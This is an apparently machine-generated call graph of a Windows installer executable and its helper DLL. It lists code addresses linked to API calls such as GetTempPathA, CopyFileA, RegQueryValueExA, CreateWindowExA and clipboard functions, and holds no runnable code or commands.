5156 6ee82b8b 5155->5156 5157 6ee82b80 GetLastError 5155->5157 5157->5156 4312 40360d SetErrorMode GetVersionExA 4313 403658 GetVersionExA 4312->4313 4315 403697 4312->4315 4314 403670 4313->4314 4313->4315 4314->4315 4316 403726 4315->4316 4317 4066e5 5 API calls 4315->4317 4318 40604a 3 API calls 4316->4318 4317->4316 4319 40373c lstrlenA 4318->4319 4319->4316 4320 40374a 4319->4320 4321 4066e5 5 API calls 4320->4321 4322 403751 4321->4322 4323 4066e5 5 API calls 4322->4323 4324 403758 4323->4324 4325 4066e5 5 API calls 4324->4325 4326 403764 #17 OleInitialize SHGetFileInfoA 4325->4326 4400 40690a lstrcpynA 4326->4400 4329 4037b2 GetCommandLineA 4401 40690a lstrcpynA 4329->4401 4331 4037c4 4332 4063e4 CharNextA 4331->4332 4333 4037f0 CharNextA 4332->4333 4334 40389f GetTempPathA 4333->4334 4344 403809 4333->4344 4402 403bd7 4334->4402 4336 4038b6 4337 403925 DeleteFileA 4336->4337 4338 4038ba GetWindowsDirectoryA lstrcatA 4336->4338 4412 40329b GetTickCount GetModuleFileNameA 4337->4412 4339 403bd7 12 API calls 4338->4339 4341 4038de 4339->4341 4341->4337 4345 4038e2 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4341->4345 4342 4063e4 CharNextA 4342->4344 4343 403936 4353 4063e4 CharNextA 4343->4353 4355 4039a6 4343->4355 4384 403998 4343->4384 4344->4342 4346 403889 4344->4346 4350 403887 4344->4350 4347 403bd7 12 API calls 4345->4347 4499 40690a lstrcpynA 4346->4499 4349 40391d 4347->4349 4349->4337 4349->4355 4350->4334 4356 403954 4353->4356 4560 4035cb 4355->4560 4362 4039ad 4356->4362 4363 40396e 4356->4363 4357 403b35 4360 403b42 GetCurrentProcess OpenProcessToken 4357->4360 4361 403b10 ExitProcess 4357->4361 4358 403b05 4359 406898 MessageBoxIndirectA 4358->4359 4359->4361 4365 403b91 4360->4365 4366 403b5a LookupPrivilegeValueA AdjustTokenPrivileges 4360->4366 4369 4062ec 5 API calls 4362->4369 4500 406421 4363->4500 4367 4066e5 5 API calls 4365->4367 4366->4365 4370 403b98 4367->4370 4372 4039b2 lstrlenA 4369->4372 4373 403baf ExitWindowsEx 4370->4373 4377 403bbc 4370->4377 4516 40690a lstrcpynA 4372->4516 4373->4361 4373->4377 4375 4039cd 4378 4039e5 4375->4378 4517 40690a lstrcpynA 4375->4517 4380 401533 100 API calls 4377->4380 4383 4039f7 wsprintfA 4378->4383 4398 403a28 4378->4398 4379 40398d 4515 40690a lstrcpynA 4379->4515 4380->4361 4385 405d47 21 API calls 4383->4385 4442 4058c3 4384->4442 4385->4378 4386 405cec 2 API calls 4386->4398 4387 405ccc 2 API calls 4387->4398 4388 403a81 SetCurrentDirectoryA 4390 4060e5 39 API calls 4388->4390 4389 403a38 GetFileAttributesA 4391 403a4e DeleteFileA 4389->4391 4389->4398 4392 403a98 CopyFileA 4390->4392 4391->4398 4392->4355 4392->4398 4394 4060e5 39 API calls 4394->4398 4395 405d47 21 API calls 4395->4398 4397 403b28 CloseHandle 4397->4355 4398->4355 4398->4378 4398->4383 4398->4386 4398->4387 4398->4388 4398->4389 4398->4394 4398->4395 4398->4397 4399 4063bd 2 API calls 4398->4399 4518 4064fd 4398->4518 4557 4064ba CreateProcessA 4398->4557 4399->4398 4400->4329 4401->4331 4403 406aed 5 API calls 4402->4403 4405 403be3 4403->4405 4404 403bed 4404->4336 4405->4404 4406 406346 3 API calls 4405->4406 4407 403bf5 4406->4407 4408 405ccc 2 API calls 4407->4408 4409 403bfb 4408->4409 4410 406851 2 API calls 4409->4410 4411 403c06 4410->4411 4411->4336 4569 40671a GetFileAttributesA CreateFileA 4412->4569 4414 4032dc 4441 4032e9 4414->4441 4570 40690a lstrcpynA 4414->4570 4416 4032ff 4571 406ac2 lstrlenA 4416->4571 4420 403310 GetFileSize 4421 403417 4420->4421 4439 403329 4420->4439 4422 4031f8 36 API calls 4421->4422 4423 403422 4422->4423 4426 40345b GlobalAlloc 4423->4426 4423->4441 4576 402f40 SetFilePointer 4423->4576 4424 402f2a ReadFile 4424->4439 4425 4034b0 4428 4031f8 36 API calls 4425->4428 4427 403473 4426->4427 4431 406851 2 API calls 4427->4431 4428->4441 4430 40343f 4432 406747 ReadFile 4430->4432 4434 403482 CreateFileA 4431->4434 4435 403451 4432->4435 4433 4031f8 36 API calls 4433->4439 4436 4034ca 4434->4436 4434->4441 4435->4426 4435->4441 4577 402f40 SetFilePointer 4436->4577 4438 4034d8 4440 4030d6 48 API calls 4438->4440 4439->4421 4439->4424 4439->4425 4439->4433 4439->4441 4440->4441 4441->4343 4443 4066e5 5 API calls 4442->4443 4444 4058d7 4443->4444 4445 4058dd 4444->4445 4446 4058ef 4444->4446 4593 406408 wsprintfA 4445->4593 4447 406776 3 API calls 4446->4447 4448 405915 4447->4448 4449 405933 lstrcatA 4448->4449 4452 406776 3 API calls 4448->4452 4451 4058ed 4449->4451 4578 405804 4451->4578 4452->4449 4455 406421 18 API calls 4456 405965 4455->4456 4457 4059f1 4456->4457 4460 406776 3 API calls 4456->4460 4458 406421 18 API calls 4457->4458 4459 4059f7 4458->4459 4461 405a07 LoadImageA 4459->4461 4462 405d47 21 API calls 4459->4462 4465 405993 4460->4465 4463 405ab4 4461->4463 4464 405a37 RegisterClassA 4461->4464 4462->4461 4468 401533 100 API calls 4463->4468 4467 405a6b SystemParametersInfoA CreateWindowExA 4464->4467 4498 405a64 4464->4498 4465->4457 4466 4059af lstrlenA 4465->4466 4469 4063e4 CharNextA 4465->4469 4470 4059e4 4466->4470 4471 4059be lstrcmpiA 4466->4471 4467->4463 4472 405aba 4468->4472 4473 4059ad 4469->4473 4475 406346 3 API calls 4470->4475 4471->4470 4474 4059ce GetFileAttributesA 4471->4474 4477 405804 22 API calls 4472->4477 4472->4498 4473->4466 4476 4059da 4474->4476 4478 4059ea 4475->4478 4476->4470 4479 406ac2 2 API calls 4476->4479 4480 405ac7 4477->4480 4594 40690a lstrcpynA 4478->4594 4479->4470 4482 405ad3 ShowWindow 4480->4482 4483 405b55 4480->4483 4485 40604a 3 API calls 4482->4485 4586 4056e9 OleInitialize 4483->4586 4487 405aeb 4485->4487 4486 405b5b 4489 405b79 4486->4489 4490 405b5f 4486->4490 4488 405af9 GetClassInfoA 4487->4488 4491 40604a 3 API calls 4487->4491 4493 405b22 DialogBoxParamA 4488->4493 4494 405b0c GetClassInfoA RegisterClassA 4488->4494 4492 401533 100 API calls 4489->4492 4497 401533 100 API calls 4490->4497 4490->4498 4491->4488 4495 405b80 4492->4495 4496 401533 100 API calls 4493->4496 4494->4493 4495->4495 4496->4498 4497->4498 4498->4355 4499->4350 4596 40690a lstrcpynA 4500->4596 4502 406432 4503 4069b5 4 API calls 4502->4503 4504 406438 4503->4504 4505 406aed 5 API calls 4504->4505 4512 40397a 4504->4512 4511 406444 4505->4511 4506 40646f lstrlenA 4507 40647b 4506->4507 4506->4511 4509 406346 3 API calls 4507->4509 4508 4063bd 2 API calls 4508->4511 4510 406480 GetFileAttributesA 4509->4510 4510->4512 4511->4506 4511->4508 4511->4512 4513 406ac2 2 API calls 4511->4513 4512->4355 4514 40690a lstrcpynA 4512->4514 4513->4506 4514->4379 4515->4384 4516->4375 4517->4378 4519 406421 18 API calls 4518->4519 4520 40651f 4519->4520 4521 406528 DeleteFileA 4520->4521 4522 40653f 4520->4522 4523 4066c8 4521->4523 4522->4523 4525 406680 4522->4525 4597 40690a lstrcpynA 4522->4597 4523->4398 4525->4523 4529 4063bd 2 API calls 4525->4529 4526 406567 4527 406571 lstrcatA 4526->4527 4528 40657f 4526->4528 4530 406585 4527->4530 4531 406ac2 2 API calls 4528->4531 4532 406698 4529->4532 4533 406593 lstrcatA 4530->4533 4535 40659b lstrlenA FindFirstFileA 4530->4535 4531->4530 4532->4523 4534 40669c 4532->4534 4533->4535 4536 406346 3 API calls 4534->4536 4535->4525 4538 4065c6 4535->4538 4537 4066a2 4536->4537 4539 406373 5 API calls 4537->4539 4540 4063e4 CharNextA 4538->4540 4548 40665f FindNextFileA 4538->4548 4554 40661f 4538->4554 4598 40690a lstrcpynA 4538->4598 4541 4066ae 4539->4541 4540->4538 4542 4066d0 4541->4542 4543 4066b2 4541->4543 4544 405ba4 28 API calls 4542->4544 4543->4523 4546 405ba4 28 API calls 4543->4546 4544->4523 4547 4066be 4546->4547 4549 4060e5 39 API calls 4547->4549 4548->4538 4550 406676 FindClose 4548->4550 4551 4066c6 4549->4551 4550->4525 4551->4523 4553 4064fd 63 API calls 4553->4554 4554->4548 4554->4553 4555 405ba4 28 API calls 4554->4555 4556 4060e5 39 API calls 4554->4556 4599 406373 4554->4599 4555->4554 4556->4554 4558 4064f9 4557->4558 4559 4064ed CloseHandle 4557->4559 4558->4398 4559->4558 4561 4035e3 4560->4561 4562 4035d5 CloseHandle 4560->4562 4563 4035fb 4561->4563 4564 4035ed CloseHandle 4561->4564 4562->4561 4607 403c45 4563->4607 4564->4563 4567 4064fd 70 API calls 4568 40360c OleUninitialize 4567->4568 4568->4357 4568->4358 4569->4414 4570->4416 4572 406ad0 4571->4572 4573 406ad5 CharPrevA 4572->4573 4574 403305 4572->4574 4573->4572 4573->4574 4575 40690a lstrcpynA 4574->4575 4575->4420 4576->4430 4577->4438 4579 405817 4578->4579 4595 406408 wsprintfA 4579->4595 4581 405890 4582 405b85 22 API calls 4581->4582 4584 405895 4582->4584 4583 4058be 4583->4455 4584->4583 4585 405d47 21 API calls 4584->4585 4585->4584 4587 4053d7 SendMessageA 4586->4587 4588 40570c 4587->4588 4591 401399 100 API calls 4588->4591 4592 405733 4588->4592 4589 4053d7 SendMessageA 4590 405745 OleUninitialize 4589->4590 4590->4486 4591->4588 4592->4589 4593->4451 4594->4457 4595->4581 4596->4502 4597->4526 4598->4538 4600 40698d 2 API calls 4599->4600 4602 40637f 4600->4602 4601 4063a1 4601->4554 4602->4601 4603 406397 DeleteFileA 4602->4603 4604 40638f RemoveDirectoryA 4602->4604 4605 40639d 4603->4605 4604->4605 4605->4601 4606 4063ac SetFileAttributesA 4605->4606 4606->4601 4608 403c53 4607->4608 4609 403600 4608->4609 4610 403c58 FreeLibrary GlobalFree 4608->4610 4609->4567 4610->4609 4610->4610 5158 40298d 5159 402993 5158->5159 5160 40299b FindClose 5159->5160 5161 402cfc 5159->5161 5160->5161 5162 6ee8103a 5163 6ee81052 5162->5163 5164 6ee810c4 5163->5164 5165 6ee81080 5163->5165 5166 6ee81060 5163->5166 5168 6ee81504 GlobalFree 5165->5168 5167 6ee81504 GlobalFree 5166->5167 5170 6ee81071 5167->5170 5169 6ee81078 5168->5169 5171 6ee81090 GlobalSize 5169->5171 5173 6ee81099 5169->5173 5172 6ee81504 GlobalFree 5170->5172 5171->5173 5172->5169 5174 6ee8109d GlobalAlloc 5173->5174 5175 6ee810ae 5173->5175 5176 6ee81558 3 API calls 5174->5176 5177 6ee810b7 GlobalFree 5175->5177 5176->5175 5177->5164 5178 402815 5179 402e92 21 API calls 5178->5179 5182 401acb 5179->5182 5181 402833 5182->5178 5182->5181 5183 40671a GetFileAttributesA CreateFileA 5182->5183 5183->5182 4856 402716 4857 402ed0 21 API calls 4856->4857 4858 402720 4857->4858 4859 402e92 21 API calls 4858->4859 4860 402729 4859->4860 4861 402734 RegQueryValueExA 4860->4861 4864 4016ed 4860->4864 4862 40275e 4861->4862 4863 402757 4861->4863 4862->4864 4866 40270b RegCloseKey 4862->4866 4863->4862 4867 406408 wsprintfA 4863->4867 4866->4864 4867->4862 5184 402498 5185 402e92 21 API calls 5184->5185 5186 40249e 5185->5186 5187 402e92 21 API calls 5186->5187 5188 4024a7 5187->5188 5189 402e92 21 API calls 5188->5189 5190 4024b0 5189->5190 5191 4063bd 2 API calls 5190->5191 5192 4024b8 5191->5192 5193 4024c9 lstrlenA lstrlenA 5192->5193 5194 405ba4 28 API calls 5192->5194 5197 402cfc 5192->5197 5195 405ba4 28 API calls 5193->5195 5194->5192 5196 40250a SHFileOperationA 5195->5196 5196->5192 5196->5197 5198 401c99 5199 402e92 21 API calls 5198->5199 5200 401ca0 5199->5200 5201 402e56 21 API calls 5200->5201 5202 401ca9 wsprintfA 5201->5202 5203 402cfc 5202->5203 5204 40251f 5205 401d09 5204->5205 5208 4016ed 5204->5208 5206 405d47 21 API calls 5205->5206 5207 401d16 5206->5207 5209 401d20 5207->5209 5210 401d45 GlobalAlloc 5207->5210 5209->5208 5214 40690a lstrcpynA 5209->5214 5211 405d47 21 API calls 5210->5211 5211->5208 5213 401d32 GlobalFree 5213->5208 5214->5213 3856 4027a0 3866 402ed0 3856->3866 3859 402e56 21 API calls 3860 4027b3 3859->3860 3861 4027da RegEnumValueA 3860->3861 3862 4027ce RegEnumKeyA 3860->3862 3864 4016ed 3860->3864 3863 402773 3861->3863 3861->3864 3862->3863 3863->3864 3865 40270b RegCloseKey 3863->3865 3865->3864 3871 402e92 3866->3871 3868 402ee8 3869 40614a RegOpenKeyExA 3868->3869 3870 4027aa 3869->3870 3870->3859 3872 405d47 21 API calls 3871->3872 3873 402ebb 3872->3873 3874 402eca 3873->3874 3876 406aed 3873->3876 3874->3868 3877 406afd 3876->3877 3879 406b65 CharNextA 3877->3879 3881 406b74 3877->3881 3883 406b53 CharNextA 3877->3883 3884 406b60 CharNextA 3877->3884 3885 4063e4 3877->3885 3878 406b7b CharPrevA 3878->3881 3879->3877 3879->3881 3881->3878 3882 406b96 3881->3882 3882->3874 3883->3877 3884->3879 3886 406404 3885->3886 3887 4063ee 3885->3887 3886->3877 3887->3886 3888 4063f7 CharNextA 3887->3888 3888->3886 3888->3887 5215 402121 5216 402e92 21 API calls 5215->5216 5217 402128 5216->5217 5218 4063bd 2 API calls 5217->5218 5219 40212e 5218->5219 5220 40213d 5219->5220 5222 406408 wsprintfA 5219->5222 5222->5220 5223 404e24 5224 404e30 5223->5224 5225 404e48 5223->5225 5233 406835 GetDlgItemTextA 5224->5233 5227 404e7c 5225->5227 5228 404e4e SHGetPathFromIDListA 5225->5228 5229 404e5e 5228->5229 5232 404e3d SendMessageA 5228->5232 5231 401533 100 API calls 5229->5231 5231->5232 5232->5227 5233->5232 5234 4029a7 5235 4029ad 5234->5235 5236 4029b5 FindNextFileA 5235->5236 5237 401898 5235->5237 5236->5237 5241 4029cc 5236->5241 5238 402e92 21 API calls 5239 4029e1 FindFirstFileA 5238->5239 5239->5241 5241->5238 5242 406408 wsprintfA 5241->5242 5242->5241 5243 6ee81000 5246 6ee8101b 5243->5246 5247 6ee81504 GlobalFree 5246->5247 5248 6ee81020 5247->5248 5249 6ee81032 5248->5249 5250 6ee81024 GlobalAlloc 5248->5250 5251 6ee81558 3 API calls 5249->5251 5250->5249 5252 6ee81019 5251->5252 5253 401ea8 5254 401eb2 5253->5254 5255 401ebc GetDlgItem 5253->5255 5256 402e56 21 API calls 5254->5256 5257 401eb9 5255->5257 5256->5257 5258 401efa GetClientRect LoadImageA SendMessageA 5257->5258 5259 402e92 21 API calls 5257->5259 5261 401f5a 5258->5261 5263 401f65 5258->5263 5259->5258 5262 401f5e DeleteObject 5261->5262 5261->5263 5262->5263 5264 403fa8 5265 403fe5 5264->5265 5266 403fcf 5264->5266 5268 403fef GetDlgItem 5265->5268 5274 404062 5265->5274 5325 406835 GetDlgItemTextA 5266->5325 5270 404007 5268->5270 5269 403fda 5272 406aed 5 API calls 5269->5272 5276 40401b SetWindowTextA 5270->5276 5280 4069b5 4 API calls 5270->5280 5271 40407f 5275 403fe0 5271->5275 5327 406835 GetDlgItemTextA 5271->5327 5272->5275 5274->5271 5279 405d47 21 API calls 5274->5279 5284 4055e0 8 API calls 5275->5284 5278 405409 22 API calls 5276->5278 5277 404174 5281 406421 18 API calls 5277->5281 5282 404038 5278->5282 5283 4040de SHBrowseForFolderA 5279->5283 5285 404011 5280->5285 5286 40417a 5281->5286 5287 405409 22 API calls 5282->5287 5283->5271 5288 4040f9 CoTaskMemFree 5283->5288 5289 404327 5284->5289 5285->5276 5290 406346 3 API calls 5285->5290 5328 40690a lstrcpynA 5286->5328 5292 404043 5287->5292 5293 406346 3 API calls 5288->5293 5290->5276 5326 4053f2 SendMessageA 5292->5326 5296 404106 5293->5296 5294 404194 5297 4066e5 5 API calls 5294->5297 5299 40413d SetDlgItemTextA 5296->5299 5302 405d47 21 API calls 5296->5302 5300 40419a 5297->5300 5298 404049 5301 4066e5 5 API calls 5298->5301 5299->5271 5310 406ac2 2 API calls 5300->5310 5312 4041e3 5300->5312 5313 40423b 5300->5313 5301->5275 5304 404125 lstrcmpiA 5302->5304 5304->5299 5306 404136 lstrcatA 5304->5306 5305 4041ef 5307 4069b5 4 API calls 5305->5307 5306->5299 5308 4041f5 GetDiskFreeSpaceA 5307->5308 5311 40421b MulDiv 5308->5311 5308->5313 5310->5300 5311->5313 5329 40690a lstrcpynA 5312->5329 5314 4042b2 5313->5314 5330 40544f 5313->5330 5315 4042da EnableWindow 5314->5315 5317 401533 100 API calls 5314->5317 5315->5275 5318 404303 5315->5318 5320 4042d8 5317->5320 5318->5275 5338 40542b SendMessageA 5318->5338 5319 40429a 5321 4042b4 SetDlgItemTextA 5319->5321 5322 40429e 5319->5322 5320->5315 5321->5314 5324 40544f 24 API calls 5322->5324 5324->5314 5325->5269 5326->5298 5327->5277 5328->5294 5329->5305 5331 405461 5330->5331 5332 405d47 21 API calls 5331->5332 5333 4054e1 5332->5333 5334 405d47 21 API calls 5333->5334 5335 4054ed 5334->5335 5336 405d47 21 API calls 5335->5336 5337 4054f9 lstrlenA wsprintfA SetDlgItemTextA 5336->5337 5337->5319 5338->5275 5339 40552d lstrcpynA lstrlenA 4612 6ee81606 4613 6ee81637 4612->4613 4654 6ee82288 4613->4654 4615 6ee8163e 4616 6ee8176f 4615->4616 4617 6ee8164f 4615->4617 4618 6ee81656 4615->4618 4701 6ee81edd 4617->4701 4685 6ee81f58 4618->4685 4623 6ee816c0 4629 6ee81711 4623->4629 4630 6ee816c6 4623->4630 4624 6ee816a2 4714 6ee82128 4624->4714 4625 6ee8168a 4639 6ee81680 4625->4639 4711 6ee82e4f 4625->4711 4626 6ee8166b 4628 6ee81675 4626->4628 4634 6ee81682 4626->4634 4628->4639 4695 6ee82bc4 4628->4695 4632 6ee82128 11 API calls 4629->4632 4733 6ee81e71 4630->4733 4644 6ee816fe 4632->4644 4633 6ee816a8 4725 6ee815f4 4633->4725 4705 6ee81774 4634->4705 4639->4623 4639->4624 4641 6ee82128 11 API calls 4641->4644 4643 6ee81688 4643->4639 4645 6ee8175e 4644->4645 4738 6ee81f1f 4644->4738 4645->4616 4647 6ee81768 GlobalFree 4645->4647 4647->4616 4651 6ee8174f 4651->4645 4742 6ee81558 wsprintfA 4651->4742 4652 6ee81742 FreeLibrary 4652->4651 4745 6ee812c6 GlobalAlloc 4654->4745 4656 6ee822b4 4746 6ee812c6 GlobalAlloc 4656->4746 4658 6ee828f7 GlobalFree GlobalFree GlobalFree 4659 6ee82917 4658->4659 4675 6ee82965 4658->4675 4660 6ee829b5 4659->4660 4668 6ee82930 4659->4668 4659->4675 4662 6ee829d6 GetModuleHandleA 4660->4662 4660->4675 4661 6ee82814 GlobalAlloc 4680 6ee822bf 4661->4680 4664 6ee829fc 4662->4664 4665 6ee829e7 LoadLibraryA 4662->4665 4663 6ee82884 GlobalFree 4663->4680 4753 6ee81ece GetProcAddress 4664->4753 4665->4664 4665->4675 4666 6ee82866 lstrcpyA 4669 6ee82871 lstrcpyA 4666->4669 4671 6ee812af 2 API calls 4668->4671 4668->4675 4669->4680 4670 6ee82a48 4672 6ee82a56 lstrlenA 4670->4672 4670->4675 4671->4675 4754 6ee81ece GetProcAddress 4672->4754 4673 6ee82a09 4673->4670 4684 6ee82a32 GetProcAddress 4673->4684 4675->4615 4677 6ee828c2 4677->4680 4751 6ee812d5 GlobalSize GlobalAlloc 4677->4751 4678 6ee82718 GlobalFree 4678->4680 4679 6ee82a70 4679->4675 4680->4658 4680->4661 4680->4663 4680->4666 4680->4669 4680->4677 4680->4678 4683 6ee827b8 lstrcpyA 4680->4683 4747 6ee812c6 GlobalAlloc 4680->4747 4748 6ee812af 4680->4748 4683->4680 4684->4670 4692 6ee81f6d 4685->4692 4687 6ee820dc GlobalFree 4689 6ee8165c 4687->4689 4687->4692 4688 6ee82038 GlobalAlloc MultiByteToWideChar 4690 6ee82067 GlobalAlloc CLSIDFromString GlobalFree 4688->4690 4694 6ee81f9a 4688->4694 4689->4625 4689->4626 4689->4639 4690->4687 4691 6ee812af lstrcpynA GlobalAlloc 4691->4692 4692->4687 4692->4688 4692->4691 4692->4694 4694->4687 4694->4692 4756 6ee814e2 4694->4756 4761 6ee81958 4694->4761 4697 6ee82bd6 4695->4697 4696 6ee82c7b ReadFile 4700 6ee82c99 4696->4700 4697->4696 4764 6ee82b72 4700->4764 4702 6ee81ef0 4701->4702 4703 6ee81efb GlobalAlloc 4702->4703 4704 6ee81655 4702->4704 4703->4702 4704->4618 4709 6ee817a0 4705->4709 4706 6ee81814 GlobalAlloc 4710 6ee81832 4706->4710 4707 6ee81825 4708 6ee81829 GlobalSize 4707->4708 4707->4710 4708->4710 4709->4706 4709->4707 4710->4643 4712 6ee82e5a 4711->4712 4713 6ee82e9a GlobalFree 4712->4713 4767 6ee812c6 GlobalAlloc 4714->4767 4716 6ee821d8 WideCharToMultiByte 4722 6ee82136 4716->4722 4717 6ee8219f lstrcpynA 4717->4722 4718 6ee821b0 StringFromGUID2 WideCharToMultiByte 4718->4722 4719 6ee82202 wsprintfA 4719->4722 4720 6ee82225 GlobalFree 4720->4722 4721 6ee8225c GlobalFree 4721->4633 4722->4716 4722->4717 4722->4718 4722->4719 4722->4720 4722->4721 4723 6ee8157e 2 API calls 4722->4723 4768 6ee815c7 4722->4768 4723->4722 4772 6ee812c6 GlobalAlloc 4725->4772 4727 6ee815f9 4728 6ee81e71 2 API calls 4727->4728 4729 6ee81603 4728->4729 4730 6ee8157e 4729->4730 4731 6ee815c2 GlobalFree 4730->4731 4732 6ee81587 GlobalAlloc lstrcpynA 4730->4732 4731->4644 4732->4731 4734 6ee81e7e wsprintfA 4733->4734 4735 6ee81eaf lstrcpyA 4733->4735 4737 6ee816e5 4734->4737 4735->4737 4737->4641 4739 6ee81f2e 4738->4739 4740 6ee81724 4738->4740 4739->4740 4741 6ee81f42 GlobalFree 4739->4741 4740->4651 4740->4652 4741->4739 4743 6ee8157e 2 API calls 4742->4743 4744 6ee81579 4743->4744 4744->4645 4745->4656 4746->4680 4747->4680 4755 6ee812c6 GlobalAlloc 4748->4755 4750 6ee812be lstrcpynA 4750->4680 4752 6ee812f3 4751->4752 4752->4677 4753->4673 4754->4679 4755->4750 4757 6ee814ef 4756->4757 4758 6ee812c6 GlobalAlloc 4756->4758 4759 6ee812af 2 API calls 4757->4759 4758->4694 4760 6ee81502 4759->4760 4760->4694 4762 6ee819c5 4761->4762 4763 6ee81967 VirtualAlloc 4761->4763 4762->4694 4763->4762 4765 6ee82b8b 4764->4765 4766 6ee82b80 GetLastError 4764->4766 4765->4639 4766->4765 4767->4722 4769 6ee815ce 4768->4769 4770 6ee815ef 4768->4770 4769->4770 4771 6ee815d7 lstrcpyA 4769->4771 4770->4722 4771->4770 4772->4727 5340 6ee81a87 5341 6ee81ab5 5340->5341 5342 6ee82288 18 API calls 5341->5342 5343 6ee81abc 5342->5343 5344 6ee81acf 5343->5344 5345 6ee81ac3 5343->5345 5347 6ee81ad9 5344->5347 5348 6ee81af0 5344->5348 5346 6ee8157e 2 API calls 5345->5346 5351 6ee81acd 5346->5351 5352 6ee81558 3 API calls 5347->5352 5349 6ee81b1c 5348->5349 5350 6ee81af6 5348->5350 5354 6ee81558 3 API calls 5349->5354 5353 6ee815f4 3 API calls 5350->5353 5355 6ee81ade 5352->5355 5356 6ee81afb 5353->5356 5354->5351 5357 6ee815f4 3 API calls 5355->5357 5358 6ee8157e 2 API calls 5356->5358 5359 6ee81ae4 5357->5359 5361 6ee81b01 GlobalFree 5358->5361 5360 6ee8157e 2 API calls 5359->5360 5362 6ee81aea GlobalFree 5360->5362 5361->5351 5361->5362 5364 40202f 5365 402e92 21 API calls 5364->5365 5366 402035 5365->5366 5367 402e92 21 API calls 5366->5367 5368 40203e 5367->5368 5369 402e92 21 API calls 5368->5369 5370 402047 5369->5370 5371 402e92 21 API calls 5370->5371 5372 402050 5371->5372 5373 405ba4 28 API calls 5372->5373 5374 40205c 5373->5374 5381 4067ee ShellExecuteExA 5374->5381 5376 4020a0 5377 406304 5 API calls 5376->5377 5378 4016ed 5376->5378 5379 4020bf CloseHandle 5377->5379 5379->5378 5381->5376 5382 40432f GetDlgItem GetDlgItem 5383 404381 7 API calls 5382->5383 5387 40459e 5382->5387 5384 404423 DeleteObject 5383->5384 5385 404417 SendMessageA 5383->5385 5386 404430 5384->5386 5385->5384 5392 405d47 21 API calls 5386->5392 5393 40446c 5386->5393 5397 40555f 5 API calls 5387->5397 5401 4046d4 5387->5401 5415 404630 5387->5415 5388 404719 5400 404738 SendMessageA 5388->5400 5410 404803 5388->5410 5389 4047ae 5390 4047d9 5389->5390 5391 4047bd SendMessageA 5389->5391 5395 4047e3 5390->5395 5412 404819 5390->5412 5391->5410 5398 404447 SendMessageA SendMessageA 5392->5398 5399 405409 22 API calls 5393->5399 5394 4046bd SendMessageA 5394->5401 5402 4047f3 5395->5402 5403 4047ec ImageList_Destroy 5395->5403 5396 4055e0 8 API calls 5404 404a2b 5396->5404 5397->5415 5398->5386 5406 404484 5399->5406 5407 404755 SendMessageA 5400->5407 5400->5410 5401->5388 5401->5389 5402->5410 5411 4047fc GlobalFree 5402->5411 5403->5402 5405 4049e2 5405->5410 5413 4049f9 ShowWindow GetDlgItem ShowWindow 5405->5413 5408 405409 22 API calls 5406->5408 5409 40476d 5407->5409 5419 404490 5408->5419 5416 404784 SendMessageA 5409->5416 5410->5396 5411->5410 5412->5405 5418 4053a5 100 API calls 5412->5418 5429 404850 5412->5429 5413->5410 5414 40456b GetWindowLongA SetWindowLongA 5417 404581 5414->5417 5415->5394 5415->5401 5416->5412 5420 404598 5417->5420 5421 404588 ShowWindow 5417->5421 5418->5429 5419->5414 5422 4044e6 SendMessageA 5419->5422 5424 404521 SendMessageA 5419->5424 5425 404534 SendMessageA 5419->5425 5426 404567 5419->5426 5435 4053f2 SendMessageA 5420->5435 5421->5420 5422->5419 5424->5419 5425->5419 5426->5414 5426->5417 5427 404997 5428 4049b1 InvalidateRect 5427->5428 5432 4049c1 5427->5432 5428->5432 5430 40488e SendMessageA 5429->5430 5431 4048a8 5429->5431 5430->5431 5431->5427 5434 40493e SendMessageA SendMessageA 5431->5434 5432->5405 5433 40544f 24 API calls 5432->5433 5433->5405 5434->5431 5435->5387 5436 402c30 5437 402c51 5436->5437 5438 402c38 5436->5438 5439 4066e5 5 API calls 5437->5439 5440 402e56 21 API calls 5438->5440 5444 402cd0 5438->5444 5441 402c85 5439->5441 5442 402c48 5440->5442 5443 402e92 21 API calls 5441->5443 5445 402e56 21 API calls 5442->5445 5446 402c8e 5443->5446 5445->5437 5446->5444 5451 405c89 5446->5451 5452 405c98 5451->5452 5453 405cb9 IIDFromString 5452->5453 5454 402c9d 5452->5454 5453->5454 5454->5444 5455 406a0a 5454->5455 5458 4062d1 WideCharToMultiByte 5455->5458 5457 402cc2 CoTaskMemFree 5457->5444 5458->5457 4799 404a35 4800 404a52 GetDlgItem GetDlgItem GetDlgItem 4799->4800 4801 404bde 4799->4801 4845 4053f2 SendMessageA 4800->4845 4803 404be6 GetDlgItem CreateThread CloseHandle 4801->4803 4804 404c2a 4801->4804 4808 404c12 4803->4808 4848 4056e9 103 API calls 4803->4848 4805 404c32 4804->4805 4806 404c5b 4804->4806 4805->4808 4809 404c3e ShowWindow ShowWindow 4805->4809 4810 404c63 4806->4810 4811 404ca9 4806->4811 4807 404acb 4815 404ad2 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4807->4815 4812 4055e0 8 API calls 4808->4812 4847 4053f2 SendMessageA 4809->4847 4814 404c7f ShowWindow 4810->4814 4817 404c6c 4810->4817 4811->4808 4816 404cbc SendMessageA 4811->4816 4823 404c20 4812->4823 4814->4817 4818 404c96 4814->4818 4819 404b22 SendMessageA SendMessageA 4815->4819 4820 404b36 4815->4820 4816->4823 4824 404cda CreatePopupMenu 4816->4824 4825 4057dd SendMessageA 4817->4825 4826 405ba4 28 API calls 4818->4826 4819->4820 4821 404b48 4820->4821 4822 404b3e SendMessageA 4820->4822 4827 405409 22 API calls 4821->4827 4822->4821 4828 405d47 21 API calls 4824->4828 4829 404c59 4825->4829 4826->4817 4830 404b5a 4827->4830 4831 404cea AppendMenuA 4828->4831 4829->4808 4832 404b63 ShowWindow 4830->4832 4833 404b95 GetDlgItem SendMessageA 4830->4833 4834 404d07 GetWindowRect 4831->4834 4835 404d1b TrackPopupMenu 4831->4835 4836 404b84 4832->4836 4837 404b79 ShowWindow 4832->4837 4833->4823 4839 404bc1 SendMessageA SendMessageA 4833->4839 4834->4835 4835->4823 4838 404d3a 4835->4838 4846 4053f2 SendMessageA 4836->4846 4837->4836 4840 404d52 SendMessageA 4838->4840 4839->4823 4840->4840 4842 404d6e OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4840->4842 4843 404d97 SendMessageA 4842->4843 4843->4843 4844 404dbc GlobalUnlock SetClipboardData CloseClipboard 4843->4844 4844->4823 4845->4807 4846->4833 4847->4829 5459 402536 5460 40253e 5459->5460 5462 402544 5459->5462 5463 402e92 21 API calls 5460->5463 5461 402555 5465 402564 5461->5465 5466 402e92 21 API calls 5461->5466 5462->5461 